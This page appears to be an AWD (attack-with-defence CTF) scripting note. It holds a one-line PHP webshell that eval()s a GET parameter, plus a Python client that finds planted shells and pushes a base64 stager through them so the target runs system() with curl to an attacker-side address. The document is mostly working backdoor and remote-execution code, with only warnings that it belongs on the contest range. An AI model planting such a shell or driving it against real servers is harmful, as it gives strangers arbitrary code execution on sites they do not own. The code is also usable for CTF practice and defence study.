AWD脚本编写_1
AWD脚本编写_1
shell.php（放在目标网站根目录下。注意：这是一个无鉴权的远程代码执行后门——任何知道参数名的人都能在目标上执行任意 PHP，只应在 AWD 靶机环境中使用，比赛结束后应立即删除）
<?php
// Minimal AWD webshell: whatever arrives in the `yanxiao` query parameter is
// executed as PHP by eval(). The only "authentication" is knowing the parameter
// name, so anyone who finds this file gets arbitrary code execution inside the
// PHP/web-server process -- plant it only on the AWD range and remove it afterwards.
error_reporting(0); // suppress PHP warnings/errors so a broken payload does not reveal the shell in the response body
// NOTE(review): the Python client on this page sends its stager as a POST field
// (data[passwd]) while this shell reads only $_GET; the two only line up if the
// client also puts the stager in the query string (or the shell reads $_REQUEST).
eval($_GET["yanxiao"]);
?>
脚本编写成功
后门文件利用与解析
import base64
import urllib.parse

import requests
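def get_flag(url, flag_url, method, passwd, flag_path):
    """Probe (or drive) the planted webshell on one AWD target host.

    url       -- target host (and optional port), e.g. "127.0.0.1"; no scheme
    flag_url  -- URL the target will be told to fetch with `curl`
    method    -- "get": only check that the shell answers with HTTP 200;
                 "post": additionally send a command through the shell and
                 print the raw response body
    passwd    -- parameter name the shell eval()s (its "password")
    flag_path -- path of the shell relative to the web root, e.g. "shell.php"

    Returns 1 when the shell answered with HTTP 200, 0 otherwise (connection
    failure, non-200 status, or an unknown method). Network errors are
    reported on stdout instead of raised so a caller can loop over many hosts
    without stopping.
    """
    # Command the remote system() will run. flag_url is operator-supplied, not
    # untrusted input, but it is dropped into a PHP double-quoted string and
    # then into a shell command unescaped: a `"`, `$` or shell metacharacter
    # in it will break (or change) the payload.
    cmd = "curl " + flag_url
    get_cmd = 'echo system("%s");' % cmd

    # Stage 1 is the one-liner the shell eval()s; stage 2 (z0) is the actual
    # PHP to run, base64-encoded so it survives transport unchanged.
    stager = "@eval(base64_decode($_POST['z0']));"
    data = {
        passwd: stager,
        "z0": base64.b64encode(get_cmd.encode("utf-8")).decode("utf-8"),
    }

    # Build the shell URL once, for both methods. Previously it was built only
    # in the "get" branch, so "post" tried to POST to a bare host name and
    # always failed with a missing-scheme error (reported as a timeout).
    target = "http://" + url + "/" + flag_path

    if method == "get":
        try:
            res = get_re(target)
        except Exception as e:
            print(f"{target} connection_timeout: {e}")
            return 0
    elif method == "post":
        # shell.php on this page reads its parameter from $_GET, while the
        # stager is sent as a POST field; putting it in the query string too
        # makes both a $_GET- and a $_POST-based shell work (the body is
        # unchanged). Note the stager is then visible in web-server access logs.
        post_url = target + "?" + urllib.parse.urlencode({passwd: stager})
        try:
            res = post_re(post_url, data)
            print(res.content)  # raw bytes of whatever the remote system() echoed
        except Exception as e:
            print(f"{target} connection_timeout: {e}")
            return 0
    else:
        # Previously an unknown method fell through silently and returned None.
        print(f"{target} unknown method: {method!r} (expected 'get' or 'post')")
        return 0

    if res.status_code != 200:
        print(f"{target} webshell not found")
        return 0
    print(f"{target} webshell is found")
    return 1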
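def get_re(url, timeout=5):
    """GET `url` and return the requests Response.

    timeout -- per-request timeout in seconds (default 5, the previous
               hard-coded value). Exceptions from requests (timeouts,
               connection errors, missing scheme) propagate to the caller;
               get_flag relies on that to detect an unreachable host.
    """
    return requests.get(url=url, timeout=timeout)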
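def post_re(url, data, timeout=5):
    """POST form-encoded `data` to `url` and return the requests Response.

    data    -- dict sent as the request body (application/x-www-form-urlencoded)
    timeout -- per-request timeout in seconds (default 5, the previous
               hard-coded value). Exceptions from requests propagate to the
               caller; get_flag relies on that to detect an unreachable host.
    """
    return requests.post(url=url, data=data, timeout=timeout)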
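if __name__ == "__main__":
    # Guarded so importing this module (e.g. to reuse get_flag across hosts)
    # does not fire a request at the hard-coded target.
    url = "127.0.0.1"                  # target host, no scheme
    flag_url = "http://192.168.45.1"   # URL the target will curl (attacker-side listener)
    method = "get"                     # "get" only probes; "post" runs the curl through the shell
    passwd = "yanxiao"                 # must match the parameter name shell.php eval()s
    flag_path = "shell.php"            # shell location relative to the web root
    get_flag(url, flag_url, method, passwd, flag_path)
    # Expected output when the shell is reachable:
    #   http://127.0.0.1/shell.php webshell is found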